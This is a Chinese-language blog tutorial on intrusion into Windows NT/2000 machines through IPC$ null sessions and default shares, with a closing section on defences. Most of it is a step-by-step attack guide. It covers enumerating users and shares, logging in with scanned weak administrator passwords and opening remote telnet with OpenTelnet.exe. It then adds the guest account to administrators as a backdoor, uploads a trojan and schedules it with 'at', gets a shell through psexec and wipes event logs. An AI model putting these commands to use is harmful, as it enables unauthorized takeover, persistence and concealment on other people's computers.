`
qinxike
  • 浏览: 22997 次
  • 性别: Icon_minigender_1
  • 来自: 北京
文章分类
社区版块
存档分类
最新评论

ipc连接知识

 
阅读更多

ipc连接知识

目录:

一前言
二什么是ipc$
三什么是空会话
四空会话可以做什么
五ipc$连接所使用的端口
六ipc$连接在hack攻击中的意义
七ipc$连接失败的常见原因
八复制文件失败的原因
九如何打开目标的IPC$共享以及其他共享
十一些需要shell才能完成的命令
十一入侵中可能会用到的相关命令
十二ipc$完整入侵步骤祥解
十三如何防范ipc$入侵
十四ipc$入侵问答精选
十五结束的话


一前言

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的种种迷惑(你随便找一个hack论坛搜一下ipc$,看看存在的疑惑有多少)。因此我参考了网上的一些资料,教程以及论坛帖子,写了这篇总结性质的文章,想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!
注意:本文所讨论的各种情况均默认发生在winNT/2000环境下,win98将不在此次讨论之列,而鉴于winXp在安全设置上有所提高,个别操作并不适用,有机会将单独讨论。


二什么是ipc$


IPC$(InternetProcessConnection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Nullsession)。那么什么是空会话呢?


三什么是空会话


在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。
在WindowsNT4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下:
1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建
立;
2)服务器产生一个随机的64位数(实现挑战)传送回客户;
3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结
果返回到服务器(实现响应);
4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,那么空会话又如何呢?

空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUSLOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组:
Everyone
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢?


四空会话可以做什么


对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows2000和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令:


1首先,我们先建立一个空会话(需要目标开放ipc$)
命令:netuse//ip/ipc$""/user:""
注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。


2查看远程主机的共享资源
命令:netview//IP
解释:建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下类似类似结果:
在//*.*.*.*的共享资源
资源共享名类型用途注释

-----------------------------------------------------------
NETLOGONDiskLogonservershare
SYSVOLDiskLogonservershare
命令成功完成。


3查看远程主机的当前时间
命令:nettime//IP
解释:用此命令可以得到一个远程主机的当前时间。


4得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)
nbtstat-AIP
用此命令可以得到一个远程主机的NetBIOS用户名列表(需要你的netbios支持),返回如下结果:

NodeIpAddress:[*.*.*.*]ScopeId:[]

NetBIOSRemoteMachineNameTable

NameTypeStatus
---------------------------------------------
SERVER<00>UNIQUERegistered
OYAMANISHI-H<00>GROUPRegistered
OYAMANISHI-H<1C>GROUPRegistered
SERVER<20>UNIQUERegistered
OYAMANISHI-H<1B>UNIQUERegistered
OYAMANISHI-H<1E>GROUPRegistered
SERVER<03>UNIQUERegistered
OYAMANISHI-H<1D>UNIQUERegistered
..__MSBROWSE__.<01>GROUPRegistered
INet~Services<1C>GROUPRegistered
IS~SERVER......<00>UNIQUERegistered

MACAddress=00-50-8B-9A-2D-37

以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在EventLog中留下记录,不管你是否登录成功。好了,那么下面我们就来看看ipc$所使用的端口是什么?


五ipc$所使用的端口


首先我们来了解一些基础知识:
1SMB:(ServerMessageBlock)Windows协议族,用于文件打印共享的服务;
2NBT:(NETBiosOverTCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
3在WindowsNT中SMB基于NBT实现,而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。

有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:

对于win2000客户端来说:
1如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
2如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。由此可见,禁止了NBT后的win2000对winNT的共享访问将会失败。


对于win2000服务器端来说:
1如果允许NBT,那么UDP端口137,138,TCP端口139,445将开放;
2如果禁止NBT,那么只有445端口开放。


我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。


六ipc$连接在hack攻击中的意义


就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,那你可就了不得了,基本上可以为所欲为了。不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些粗心的管理员存在弱口令,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码将会越来越难的,因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,甚至在主机不开启ipc$共享时,你根本就无法连接,你会慢慢的发现ipc$连接并不是万能的,所以不要奢望每次连接都能成功,那是不现实的。
是不是有些灰心?倒也不用,关键是我们要摆正心态,不要把ipc$入侵当作终极武器,不要认为它战无不胜,它只是很多入侵方法中的一种,你有可能利用它一击必杀,也有可能一无所获,这些都是正常的,在黑客的世界里,不是每条大路都能通往罗马,但总有一条路会通往罗马,耐心的寻找吧!


七ipc$连接失败的常见原因

以下是一些常见的导致ipc$连接失败的原因:


1IPC连接是WindowsNT及以上系统中特有的功能,由于其需要用到WindowsNT中很多DLL函数,所以不能在Windows9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;


2如果想成功的建立一个ipc$连接,就需要对方开启ipc$共享,即使是空连接也是这样,如果对方关闭了ipc$共享,你将会建立失败;


3你未启动Lanmanworkstation服务,它提供网络链结和通讯,没有它你无法发起连接请求(显示名为:Workstation);


4对方未启动Lanmanserver服务,它提供了RPC支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它远程主机将无法响应你的连接请求(显示名为:Server);


5对方未启动NetLogon,它支持网络上计算机pass-through帐户登录身份;


6对方禁止了NBT(即未打开139端口);


7对方防火墙屏蔽了139和445端口;


8你的用户名或者密码错误(显然空会话排除这种错误);


9命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;


10如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。


另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。


八复制文件失败的原因


有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?


1盲目复制
这类错误出现的最多,占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用netview//IP这个命令看一下对方的共享情况,不要认为ipc$连接建立成功了就一定有共享文件夹。


2默认共享判断错误
这类错误也是大家经常犯的,主要有两个小方面:

1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向admin$之类的默认共享复制文件,导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享,ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享并不是ipc$共享的必要条件;

2)由于netview//IP无法显示默认共享(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)


3用户权限不够,包括四种情形:
1)空连接向所有共享(默认共享和普通共享)复制时,大多情况下权限是不够的;
2)向默认共享复制时,要具有管理员权限;
3)向普通共享复制时,要具有相应权限(即对方事先设定的访问权限);
4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;

还需要说明一点:不要认为administrator就一定是管理员,管理员名称是可以改的。


4被防火墙杀死或在局域网
也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;还有可能你把木马复制到了局域网内的主机,导致连接失败。因此建议你复制时要小心,否则就前功尽弃了。


呵呵,大家也知道,ipc$连接在实际操作过程中会出现千奇百怪的问题,上面我所总结的只是一些常见错误,没说到的,只能让大家自己去体会了。


九如何打开目标的IPC$共享以及其他共享


目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等,然后在shell下执行netshareipc$来开放目标的ipc$,用netshareipc$/del来关闭共享。如果你要给它开共享文件夹,你可以用netsharebaby=c:/,这样就把它的c盘开为共享名为baby共享了。


十一些需要shell才能完成的命令


看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:

1向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;

2打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;

3运行/关闭远程主机的服务,需要在shell下完成;

4启动/杀掉远程主机的进程,也需要在shell下完成。


十一入侵中可能会用到的相关命令


请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。

1建立空连接:
netuse//IP/ipc$""/user:""

2建立非空连接:
netuse//IP/ipc$"psw"/user:"account"

3查看远程主机的共享资源(但看不到默认共享)
netview//IP

4查看本地主机的共享资源(可以看到本地的默认共享)
netshare

5得到远程主机的用户名列表
nbtstat-AIP

6得到本地主机的用户列表
netuser

7查看远程主机的当前时间
nettime//IP

8显示本地主机当前服务
netstart

9启动/关闭本地服务
netstart服务名/y
netstop服务名/y

10映射远程共享:
netusez://IP/baby
此命令将共享名为baby的共享资源映射到z盘

11删除共享映射
netusec:/del删除映射的c盘,其他盘类推
netuse*/del/y删除全部

12向远程主机复制文件
copy/路径/srv.exe//IP/共享目录名,如:
copyccbirds.exe//*.*.*.*/c即将当前目录下的文件复制到对方c盘内

13远程添加计划任务
at//ip时间程序名,如:
at//127.0.0.011:00love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径


14开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:

1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就该ntlm认证
4)对WIN2K/XP有效,NT未经测试
命令格式:OpenTelnet.exe//serveraccountpswNTLM认证方式port
试例如下:c:/>OpenTelnet.exe//*.*.*.*administrator""190

15激活用户/加入管理员组
1netuesraccount/active:yes
2netlocalgroupadministratorsaccount/add

16关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe//serveraccountpsw
试例如下:c:/>ResumeTelnet.exe//*.*.*.*administrator""

17删除一个已建立的ipc$连接
netuse//IP/ipc$/del


(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net


十二ipc$完整入侵步骤祥解

其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!

1用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空


2此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧


3上面开telnet的命令没忘吧,要用到opentelnet这个小程序
c:/>OpenTelnet.exe//192.168.21.*administrator""190
如果返回如下信息
*******************************************************
RemoteTelnetConfigure,byrefdom
Email:refdom@263.net
OpenTelnet.exe

Usage:OpenTelnet.exe//serverusernamepasswordNTLMAuthortelnetport
*******************************************************
Connecting//192.168.21.*...Successfully!

NOTICE!!!!!!
TheTelnetServicedefaultsetting:NTLMAuthor=2TelnetPort=23

Startingtelnetservice...
telnetserviceisstartedsuccessfully!telnetserviceisrunning!

BINGLE!!!Yeah!!
TelnetPortis90.Youcantry:"telnetip90",toconnecttheserver!
Disconnectingserver...Successfully!
*说明你已经打开了一个端口90的telnet。


4现在我们telnet上去
telnet192.168.21.*90
如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了


5C:/>netuserguest/active:yes
*将Guest用户激活,也有可能人家的guest本来就试活的,你可以用netuserguest看一下它的帐户启用的值是yes还是no


6C:/>netuserguest1234
*将Guest的密码改为1234,或者改成你喜欢的密码


7C:/>netlocalgroupadministratorsguest/add
*将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。


8好了,现在我们来走另一条路,给它传个木马玩玩


9首先,我们先建立起ipc$连接
C:/>netuse//192.168.21.*/ipc$""/user:administrator


10既然要上传东西,就要先知道它开了什么共享
C:/>netview//192.168.21.*
//192.168.21.*的共享资源
资源共享名类型用途注释

-----------------------------------------------------------
CDisk
DDisk
命令成功完成。
*好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用netview命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。


11C:/>copylove.exe//192.168.21.*/c
已复制1个文件
*用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现


12运行木马前,我们先看看它现在的时间
nettime//192.168.21.*
//192.168.21.*的当前时间是2003/8/22上午11:00
命令成功完成


13现在我们用at运行它吧,不过对方一定要开了TaskScheduler服务(允许程序在指定时间运行),否则就不行了
C:/>at//192.168.21.*11:02c:/love.exe
新加了一项作业,其作业ID=1


14剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了


嗯,好了,两种基本方法都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec//tergetIP-uuser-ppaswdcmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。
讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面


十三如何防范ipc$入侵


1禁止空连接进行枚举(此操作并不能阻止空连接的建立)

方法1:
运行regedit,找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA]把RestrictAnonymous=DWORD的键值改为:1
如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但限制通过这种连接得到列举SAM帐号和共享等信息;在Windows2000中增加了"2",限制所有匿名访问除非特别授权,如果设置为2的话,可能会有一些其他问题发生,建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。

方法2:
在本地安全设置-本地策略-安全选项-在'对匿名连接的额外限制'中做相应设置


2禁止默认共享

1)察看本地共享资源
运行-cmd-输入netshare

2)删除共享(重起后默认共享仍然存在)
netshareipc$/delete
netshareadmin$/delete
netsharec$/delete
netshared$/delete(如果有e,f,……可以继续删除)

3)停止server服务
netstopserver/y(重新启动后server服务会重新开启)

4)禁止自动打开默认共享(此操作并未关闭ipc$共享)
运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareServer(DWORD)的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加。


3关闭ipc$和默认共享依赖的服务:server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用
这时可能会有提示说:XXX服务也会关闭是否继续,因为还有些次要的服务要依赖于lanmanserver,不要管它。


4屏蔽139,445端口
由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻止ipc$入侵。

1)139端口可以通过禁止NBT来屏蔽
本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’一项

2)445端口可以通过修改注册表来屏蔽
添加一个键值
Hive:HKEY_LOCAL_MACHINE
Key:System/Controlset/Services/NetBT/Parameters
Name:SMBDeviceEnabled
Type:REG_DWORD
Value:0
修改完后重启机器

注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。


3)安装防火墙进行端口过滤


5设置复杂密码,防止通过ipc$穷举出密码。


分享到:
评论

相关推荐

    03IPC$入侵--空连接漏洞知识.pdf

    03IPC$入侵--空连接漏洞知识.pdf

    网络安全培训视频教程-49.基于DOS命令的IPC简单入侵演示(下).rar

    应与此情况,黑客动画吧积极配合互联网安全防治,携手网易学院,推出这一系列大型网络安全免费培训教程,旨在普及网络安全知识,提升广大网民安全意识。通过了解一些黑客常用攻击手法,来发现自身的一些安全隐患,并...

    网络安全知识总结.docx

    查本地共享资源 删除共享 删除ipc$空连接 账号密码的平安准绳 关闭本人的139端口 445端口的关闭 3389的关闭 4899的防备 常见端口的引见 如何查看本机打开的端口和过滤 禁用服务 本地策略 本地平安策略 用户权限安排...

    有效解决局域网共享的常见问题

    知识普及:IPC$入侵是黑客惯用的手段。IPC$漏洞不能穿越路由器,所以用路由器上网的用户不必担心开放了局域网共享会有什么隐患。但要注意:路由器会被人扫描并窃取保存在里面的ADSL帐号密码。所以也不要大意,赶快把...

    视频监控客户端软件

    视频监控客户端是针对连接多台不同类型或型号的设备(如IPC,NVS,DVS等产品),此说明书只针对专业视频监控系统的客户端软件操作进行介绍,涉及到具体设备的功能设置请阅读相关的产品说明书。 本手册是为使用UC2...

    局域网共享设置超级工具

    系统默认:利用IPC$通道可以建立空连接,匿 名枚举出该机有多少帐户.显然有一定的安全隐患 黑客可以利用扫描器,找到开放IPC$共享的电脑, 匿名枚举出该机的所有用户帐号,如果用户的帐号 不设密码,则容易被入侵. 建议...

    映射网络驱动器非常好用VC++

    以前学习网络安全知识的时候,常常建立远程电脑的IPC$连接后,使用net use z:\\127.0.0.1\c$把对方的C盘映射到本地的Z盘. 还可以通过在“开始|网上邻居”点击右键,选择“映射网络驱动器”来实现。这里我要讲的是如何...

    解决局域网共享

    知识普及:IPC$入侵是黑客惯用的手段。IPC$漏洞不能穿越路由器,所以用路由器上网的用户不必担心开放了局域网共享会有什么隐患。但要注意:路由器会被人扫描并窃取保存在里面的ADSL帐号密码。所以也不要大意,赶快把...

    解决局域网共享问题

    &lt;br&gt;知识普及:IPC$入侵是黑客惯用的手段。IPC$漏洞不能穿越路由器,所以用路由器上网的用户不必担心开放了局域网共享会有什么隐患。但要注意:路由器会被人扫描并窃取保存在里面的ADSL帐号密码。所以也不要大意...

    解决局域网共享 原系统的局域网设置条目很多,对此不太熟悉的用户,可能搞得焦头烂额也未能搞定局域网互访。

    知识普及:IPC$入侵是黑客惯用的手段。IPC$漏洞不能穿越路由器,所以用路由器上网的用户不必担心开放了局域网共享会有什么隐患。但要注意:路由器会被人扫描并窃取保存在里面的ADSL帐号密码。所以也不要大意,赶快把...

    轻松一键解决局域网共享

    知识普及:IPC$入侵是黑客惯用的手段。IPC$漏洞不能穿越路由器,所以用路由器上网的用户不必担心开放了局域网共享会有什么隐患。但要注意:路由器会被人扫描并窃取保存在里面的ADSL帐号密码。所以也不要大意,赶快把...

    解决局域网共享问题.rar

    知识普及:IPC$入侵是黑客惯用的手段。IPC$漏洞不能穿越路由器,所以用路由器上网的用户不必担心开放了局域网共享会有什么隐患。但要注意:路由器会被人扫描并窃取保存在里面的ADSL帐号密码。所以也不要大意,赶快把...

    局域共享-小工具

    知识普及:IPC$入侵是黑客惯用的手段。IPC$漏洞不能穿越路由器,所以用路由器上网的用户不必担心开放了局域网共享会有什么隐患。但要注意:路由器会被人扫描并窃取保存在里面的ADSL帐号密码。所以也不要大意,赶快把...

    解决局域网共享.rar

    知识普及:IPC$入侵是黑客惯用的手段。IPC$漏洞不能穿越路由器,所以用路由器上网的用户不必担心开放了局域网共享会有什么隐患。但要注意:路由器会被人扫描并窃取保存在里面的ADSL帐号密码。所以也不要大意,赶快把...

    Android开发艺术探索.任玉刚(带详细书签).pdf

    2.5 Binder连接池 112 2.6 选用合适的IPC方式 121 第3章 View的事件体系 122 3.1 View基础知识 122 3.1.1 什么是View 123 3.1.2 View的位置参数 123 3.1.3 MotionEvent和TouchSlop 125 3.1.4 VelocityTracker...

    android开发艺术探索高清完整版PDF

    71 2.4.5 使用 Content Provider / 91 2.4.6 使用Socket / 103 2.5 Binder连接池 / 112 2.6 选用合适的IPC方式 / 121 第3章 View的事件体系 / 122 3.1 View基础知识 / 122 3.1.1 什么是View / 123 3.1.2 View...

Global site tag (gtag.js) - Google Analytics